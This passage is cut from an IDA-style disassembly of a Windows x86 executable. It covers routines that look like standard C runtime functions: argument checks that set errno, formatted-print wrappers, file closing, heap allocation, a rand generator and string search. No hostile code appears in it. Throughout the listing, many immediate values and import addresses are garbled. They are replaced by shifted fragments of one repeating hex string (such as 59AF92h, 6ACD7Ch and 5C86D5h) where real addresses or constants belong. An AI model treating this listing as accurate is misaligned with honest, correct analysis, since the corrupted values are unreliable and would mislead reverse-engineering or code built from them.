call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402F72+15�j
cmp [ebp+arg_8], edi
jz short loc_402FBF
cmp [ebp+arg_4], esi
jb short loc_402FBF
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407BF0
add esp, 0Ch
jmp short loc_402F80
; ---------------------------------------------------------------------------
loc_402FBF: ; CODE XREF: sub_402F72+35�j
; sub_402F72+3A�j
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_402F89
cmp [ebp+arg_4], esi
jnb short loc_402FE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402F93
; ---------------------------------------------------------------------------
loc_402FE6: ; CODE XREF: sub_402F72+64�j
push 16h
pop eax
loc_402FE9: ; CODE XREF: sub_402F72+10�j
; sub_402F72+30�j
pop edi
pop esi
pop ebp
retn
sub_402F72 endp
; =============== S U B R O U T I N E =======================================
sub_402FED proc near ; CODE XREF: J8@F_7_S:00402FFE�p
push ecx
mov dword ptr [ecx], offset off_41D38C
call sub_407F55
pop ecx
retn
sub_402FED endp
; ---------------------------------------------------------------------------
loc_402FFB: ; DATA XREF: J8@F_7_S:off_41D38C�o
push esi
mov esi, ecx
call sub_402FED
test byte ptr [esp+8], 1
jz short loc_403011
push esi
call sub_402F6D
pop ecx
loc_403011: ; CODE XREF: J8@F_7_S:00403008�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_403017 proc near ; CODE XREF: sub_40BA07+12D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_407FD0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_403017 endp
; =============== S U B R O U T I N E =======================================
sub_403032 proc near ; CODE XREF: sub_40304B+3B�p
push esi
push 1
push 59AF92h
mov esi, ecx
call sub_402C5A
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn
sub_403032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40304B proc near ; CODE XREF: sub_401291+5�p
; sub_401395+5�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_403060
; ---------------------------------------------------------------------------
loc_403053: ; CODE XREF: sub_40304B+20�j
push [ebp+arg_0]
call sub_408062
test eax, eax
pop ecx
jz short loc_40306F
loc_403060: ; CODE XREF: sub_40304B+6�j
push [ebp+arg_0]
call sub_4036E0
test eax, eax
pop ecx
jz short loc_403053
leave
retn
; ---------------------------------------------------------------------------
loc_40306F: ; CODE XREF: sub_40304B+13�j
test byte ptr ds:dword_425A90, 1
mov edx, 0C59AF9h
jnz short loc_403096
or ds:dword_425A90, 1
mov ecx, esi
call sub_403032
push 6ACD7Ch
call sub_402E21
pop ecx
loc_403096: ; CODE XREF: sub_40304B+30�j
push esi
lea ecx, [ebp+var_C]
call sub_402C72
push 3566BEh
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
sub_40304B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030B5 proc near ; CODE XREF: sub_4190BD+84�p
; sub_4190BD+102�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4030E0
loc_4030C3: ; CODE XREF: sub_4030B5+30�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40312D
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_4030B5+C�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4030C3
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_4069D7
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_40311E
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40312A
; ---------------------------------------------------------------------------
loc_40311E: ; CODE XREF: sub_4030B5+60�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40312A: ; CODE XREF: sub_4030B5+67�j
mov eax, esi
pop esi
loc_40312D: ; CODE XREF: sub_4030B5+29�j
pop ebx
leave
retn
sub_4030B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403130 proc near ; CODE XREF: sub_4031F4+A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push 5AB35Fh
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov edi, [ebp+arg_0]
cmp edi, ebx
setnz al
cmp eax, ebx
jnz short loc_40316B
loc_40314F: ; CODE XREF: sub_403130+47�j
; sub_403130+52�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
loc_403167: ; CODE XREF: sub_403130+6B�j
; sub_403130+92�j
xor eax, eax
jmp short loc_4031E4
; ---------------------------------------------------------------------------
loc_40316B: ; CODE XREF: sub_403130+1D�j
xor eax, eax
mov esi, [ebp+arg_4]
cmp esi, ebx
setnz al
cmp eax, ebx
jz short loc_40314F
xor eax, eax
cmp [esi], bl
setnz al
cmp eax, ebx
jz short loc_40314F
call sub_4084A1
mov [ebp+arg_0], eax
cmp eax, ebx
jnz short loc_40319D
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_40319D: ; CODE XREF: sub_403130+5E�j
mov [ebp+ms_exc.disabled], ebx
cmp [edi], bl
jnz short loc_4031C4
call sub_4057D3
mov dword ptr [eax], 16h
push 0FFFFFFFEh
lea eax, [ebp+ms_exc.prev_er]
push eax
push 6D59AFh
call sub_4085C8
add esp, 0Ch
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403130+72�j
push eax
push [ebp+arg_8]
push esi
push edi
call sub_4081FF
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4031EA
mov eax, [ebp+var_1C]
loc_4031E4: ; CODE XREF: sub_403130+39�j
call __SEH_epilog4
retn
sub_403130 endp
; =============== S U B R O U T I N E =======================================
sub_4031EA proc near ; CODE XREF: sub_403130+AC�p
; DATA XREF: J8@F_7_S:00421360�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_4031EA endp
; =============== S U B R O U T I N E =======================================
sub_4031F4 proc near ; CODE XREF: sub_4190BD+116�p
; sub_41B3D0+4E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403130
add esp, 0Ch
retn
sub_4031F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403207 proc near ; CODE XREF: sub_4190BD+131�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 0Ch
push 36ACD7h
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov esi, [ebp+arg_0]
cmp esi, ebx
setnz al
cmp eax, ebx
jnz short loc_403246
loc_403226: ; CODE XREF: sub_403207+49�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403346
; ---------------------------------------------------------------------------
loc_403246: ; CODE XREF: sub_403207+1D�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
cmp eax, ebx
jz short loc_403226
mov [ebp+arg_0], esi
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], ebx
test byte ptr [esi+0Ch], 40h
jnz loc_40330F
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032A3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032A3
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032A8
; ---------------------------------------------------------------------------
loc_4032A3: ; CODE XREF: sub_403207+6C�j
; sub_403207+78�j
mov esi, 80DAB3h
loc_4032A8: ; CODE XREF: sub_403207+9A�j
test byte ptr [eax+24h], 7Fh
jnz short loc_4032F3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032E8
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032E8
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032ED
; ---------------------------------------------------------------------------
loc_4032E8: ; CODE XREF: sub_403207+B1�j
; sub_403207+BD�j
mov esi, 0A90DABh
loc_4032ED: ; CODE XREF: sub_403207+DF�j
test byte ptr [eax+24h], 80h
jz short loc_40330F
loc_4032F3: ; CODE XREF: sub_403207+A5�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or [ebp+var_1C], 0FFFFFFFFh
loc_40330F: ; CODE XREF: sub_403207+5C�j
; sub_403207+EA�j
cmp [ebp+var_1C], ebx
jnz short loc_403337
push esi
call sub_40871B
mov edi, eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
push esi
call sub_4069D7
mov [ebp+var_1C], eax
push esi
push edi
call sub_4087B1
add esp, 1Ch
loc_403337: ; CODE XREF: sub_403207+10B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40334C
mov eax, [ebp+var_1C]
loc_403346: ; CODE XREF: sub_403207+3A�j
call __SEH_epilog4
retn
sub_403207 endp
; =============== S U B R O U T I N E =======================================
sub_40334C proc near ; CODE XREF: sub_403207+137�p
; DATA XREF: J8@F_7_S:00421380�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_40334C endp
; =============== S U B R O U T I N E =======================================
sub_403356 proc near ; CODE XREF: sub_41748B+4F�p
; sub_41A9DE+20F�p
arg_0 = dword ptr 4
call sub_40539D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_403356 endp
; =============== S U B R O U T I N E =======================================
sub_403363 proc near ; CODE XREF: sub_41748B:loc_417607�p
; sub_4190BD+A7�p ...
call sub_40539D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_403363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403385 proc near ; CODE XREF: sub_403436+12�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_4033B3
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403433
; ---------------------------------------------------------------------------
loc_4033B3: ; CODE XREF: sub_403385+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_4033DF
cmp esi, ebx
jnz short loc_4033DF
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_403432
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_403385+37�j
; sub_403385+3B�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_4033EE
mov [ebp+var_1C], ecx
loc_4033EE: ; CODE XREF: sub_403385+64�j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_403431
dec [ebp+var_1C]
js short loc_403423
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: sub_403385+95�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40342F: ; CODE XREF: sub_403385+9C�j
mov eax, edi
loc_403431: ; CODE XREF: sub_403385+90�j
pop edi
loc_403432: ; CODE XREF: sub_403385+58�j
pop esi
loc_403433: ; CODE XREF: sub_403385+29�j
pop ebx
leave
retn
sub_403385 endp
; =============== S U B R O U T I N E =======================================
sub_403436 proc near ; CODE XREF: sub_4172CC+3E�p
; sub_417361+7C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_403385
add esp, 14h
retn
sub_403436 endp
; =============== S U B R O U T I N E =======================================
sub_403451 proc near ; CODE XREF: sub_4034C4+5A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40347E
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4034C0
; ---------------------------------------------------------------------------
loc_40347E: ; CODE XREF: sub_403451+E�j
test byte ptr [esi+0Ch], 83h
jz short loc_4034BB
push esi
call sub_408BDA
push esi
mov ebx, eax
call sub_408BAE
push esi
call sub_408A20
push eax
call sub_408AE1
add esp, 10h
test eax, eax
jge short loc_4034AA
or ebx, 0FFFFFFFFh
jmp short loc_4034BB
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403451+52�j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_4034BB
push eax
call sub_403603
pop ecx
mov [esi+1Ch], edi
loc_4034BB: ; CODE XREF: sub_403451+31�j
; sub_403451+57�j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_4034C0: ; CODE XREF: sub_403451+2B�j
pop edi
pop esi
pop ebx
retn
sub_403451 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C4 proc near ; CODE XREF: sub_40DFD3+43�p
; sub_4190BD+137�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 5C86D5h
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_403501
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40350D
; ---------------------------------------------------------------------------
loc_403501: ; CODE XREF: sub_4034C4+1E�j
test byte ptr [esi+0Ch], 40h
jz short loc_403513
mov [esi+0Ch], edi
loc_40350A: ; CODE XREF: sub_4034C4+6F�j
mov eax, [ebp+var_1C]
loc_40350D: ; CODE XREF: sub_4034C4+3B�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403513: ; CODE XREF: sub_4034C4+41�j
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_403451
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403538
jmp short loc_40350A
sub_4034C4 endp
; =============== S U B R O U T I N E =======================================
sub_403535 proc near ; DATA XREF: J8@F_7_S:004213A0�o
mov esi, [ebp+8]
sub_403535 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403538 proc near ; CODE XREF: sub_4034C4+6A�p
push esi
call sub_4081AD
pop ecx
retn
sub_403538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403540 proc near ; CODE XREF: J8@F_7_S:004192C0�p
; sub_4192FB+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword ptr ds:2E436Ah
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 5721B5h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_408D70
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_40357A
mov [ecx], eax
mov [ecx+4], edx
locret_40357A: ; CODE XREF: sub_403540+33�j
leave
retn
sub_403540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_4035E4+15�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push esi
call sub_404130
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_4035AD
loc_403590: ; CODE XREF: sub_40357C+34�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4035E1
; ---------------------------------------------------------------------------
loc_4035AD: ; CODE XREF: sub_40357C+12�j
cmp [ebp+arg_4], edi
jz short loc_403590
mov ecx, 7FFFFFFFh
cmp eax, ecx
mov [ebp+var_14], 49h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
ja short loc_4035CE
mov [ebp+var_1C], eax
loc_4035CE: ; CODE XREF: sub_40357C+4D�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call [ebp+arg_0]
add esp, 10h
loc_4035E1: ; CODE XREF: sub_40357C+2F�j
pop edi
leave
retn
sub_40357C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4035E4 proc near ; CODE XREF: sub_401F1C+22E�p
; sub_401F1C+36B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
lea eax, [esp+4+arg_8]
push eax
push 0
push [esp+0Ch+arg_4]
push 2B90DAh
call sub_40357C
add esp, 10h
pop esi
retn
sub_4035E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403603 proc near ; CODE XREF: sub_402CCA+F�p sub_402F6D�j ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00403662 SIZE 0000002F BYTES
push 0Ch
push 15C86Dh
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_40368B
cmp ds:dword_434DF4, 3
jnz short loc_403662
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_405B25
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_403642
push esi
push eax
call sub_405B50
pop ecx
pop ecx
loc_403642: ; CODE XREF: sub_403603+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403659
cmp [ebp+var_1C], 0
jnz short loc_40368B
push [ebp+arg_0]
jmp short loc_403663
sub_403603 endp
; =============== S U B R O U T I N E =======================================
sub_403659 proc near ; CODE XREF: sub_403603+46�p
; DATA XREF: J8@F_7_S:004213C0�o
push 4
call sub_40591F
pop ecx
retn
sub_403659 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403603
loc_403662: ; CODE XREF: sub_403603+1A�j
push esi
loc_403663: ; CODE XREF: sub_403603+54�j
push 0
push ds:dword_425F68
call dword ptr ds:4AE436h
test eax, eax
jnz short loc_40368B
call sub_4057D3
mov esi, eax
call dword ptr ds:25721Bh
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40368B: ; CODE XREF: sub_403603+11�j
; sub_403603+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_403603
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403691 proc near ; CODE XREF: sub_4036E0+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 52B90Dh
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, ds:dword_434DE4
ja short loc_4036CE
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4036D7
loc_4036CE: ; CODE XREF: sub_403691+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403691 endp
; =============== S U B R O U T I N E =======================================
sub_4036D7 proc near ; CODE XREF: sub_403691+38�p
; DATA XREF: J8@F_7_S:004213E0�o
push 4
call sub_40591F
pop ecx
retn
sub_4036D7 endp
; =============== S U B R O U T I N E =======================================
sub_4036E0 proc near ; CODE XREF: sub_402C0C+1F�p
; sub_402C72+2A�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_40378D
push ebx
mov ebx, ds:dword_41D114
push esi
push edi
loc_4036F7: ; CODE XREF: sub_4036E0+94�j
xor esi, esi
cmp ds:dword_425F68, esi
mov edi, ebp
jnz short loc_40371B
call sub_409C54
push 1Eh
call sub_409AB4
push 695C86h
call sub_4078A7
pop ecx
pop ecx
loc_40371B: ; CODE XREF: sub_4036E0+21�j
mov eax, ds:dword_434DF4
cmp eax, 1
jnz short loc_403733
cmp ebp, esi
jz short loc_40372D
mov eax, ebp
jmp short loc_403730
; ---------------------------------------------------------------------------
loc_40372D: ; CODE XREF: sub_4036E0+47�j
xor eax, eax
inc eax
loc_403730: ; CODE XREF: sub_4036E0+4B�j
push eax
jmp short loc_403751
; ---------------------------------------------------------------------------
loc_403733: ; CODE XREF: sub_4036E0+43�j
cmp eax, 3
jnz short loc_403743
push ebp
call sub_403691
cmp eax, esi
pop ecx
jnz short loc_40375A
loc_403743: ; CODE XREF: sub_4036E0+56�j
cmp ebp, esi
jnz short loc_40374A
xor edi, edi
inc edi
loc_40374A: ; CODE XREF: sub_4036E0+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403751: ; CODE XREF: sub_4036E0+51�j
push esi
push ds:dword_425F68
call ebx
loc_40375A: ; CODE XREF: sub_4036E0+61�j
mov esi, eax
test esi, esi
jnz short loc_403786
cmp ds:dword_4262EC, eax
push 0Ch
pop edi
jz short loc_403778
push ebp
call sub_408062
test eax, eax
pop ecx
jnz short loc_4036F7
jmp short loc_40377F
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_4036E0+89�j
call sub_4057D3
mov [eax], edi
loc_40377F: ; CODE XREF: sub_4036E0+96�j
call sub_4057D3
mov [eax], edi
loc_403786: ; CODE XREF: sub_4036E0+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40378D: ; CODE XREF: sub_4036E0+8�j
push ebp
call sub_408062
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_4036E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037B0 proc near ; CODE XREF: sub_41783D+84�p
; sub_4184BF+1B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_403830
mov dh, [ecx+1]
test dh, dh
jz short loc_40381D
loc_4037C8: ; CODE XREF: sub_4037B0+58�j
; sub_4037B0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_4037EE
test al, al
jz short loc_4037E8
loc_4037DB: ; CODE XREF: sub_4037B0+36�j
mov al, [esi]
add esi, 1
loc_4037E0: ; CODE XREF: sub_4037B0+45�j
cmp al, dl
jz short loc_4037EE
test al, al
jnz short loc_4037DB
loc_4037E8: ; CODE XREF: sub_4037B0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4037EE: ; CODE XREF: sub_4037B0+25�j
; sub_4037B0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_4037E0
lea edi, [esi-1]
loc_4037FA: ; CODE XREF: sub_4037B0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_403829
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4037C8
mov al, [ecx+3]
test al, al
jz short loc_403829
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4037FA
jmp short loc_4037C8
; ---------------------------------------------------------------------------
loc_40381D: ; CODE XREF: sub_4037B0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_403856
; ---------------------------------------------------------------------------
loc_403829: ; CODE XREF: sub_4037B0+4F�j
; sub_4037B0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_403830: ; CODE XREF: sub_4037B0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4037B0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_403850
loc_403840: ; CODE XREF: sub_403850+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_403850
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_41837F+B�p
; sub_418396+35�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00403840 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_403856: ; CODE XREF: sub_4037B0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40387D
loc_403868: ; CODE XREF: sub_403850+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_403840
test cl, cl
jz short loc_4038C6
test edx, 3
jnz short loc_403868
loc_40387D: ; CODE XREF: sub_403850+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_403888: ; CODE XREF: sub_403850+63�j
; sub_403850+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4038CA
and eax, 81010100h
jz short loc_403888
and eax, 1010100h
jnz short loc_4038C4
and esi, 80000000h
jnz short loc_403888
loc_4038C4: ; CODE XREF: sub_403850+6A�j
; sub_403850+83�j ...
pop esi
pop edi
loc_4038C6: ; CODE XREF: sub_403850+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4038CA: ; CODE XREF: sub_403850+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_403907
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_403900
test ah, ah
jz short loc_4038C4
shr eax, 10h
cmp al, bl
jz short loc_4038F9
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_4038F2
test ah, ah
jz short loc_4038C4
jmp short loc_403888
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: sub_403850+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4038F9: ; CODE XREF: sub_403850+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403900: ; CODE XREF: sub_403850+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403907: ; CODE XREF: sub_403850+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_403850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403910 proc near ; CODE XREF: sub_417676+104�p
; sub_41783D+D9�p ...
